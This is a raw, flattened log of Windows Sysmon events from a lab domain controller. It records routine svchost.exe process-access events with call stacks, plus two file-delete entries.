12:02:18.488{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005584Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.488{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005583Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.488{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005582Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.457{266CAFBE-64C6-6064-A900-00000000AE01}34044568C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005581Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.457{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005580Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.457{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005579Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.457{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\AppReadiness\S-1-5-21-4055678433-3894535204-3898404691-500MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005578Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.457{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=998E05597ECF7109CAFE378433D4EEBC,SHA256=1AD717702256588B52F3C0C83AB872C9CA4680921FC80C024105510CEB14BD57,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005577Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005576Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005575Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005574Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005573Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005572Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005571Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005570Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005569Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005568Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005567Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005566Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005565Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005564Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005563Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005562Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-64C6-6064-A900-00000000AE01}34042980C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005561Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005560Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 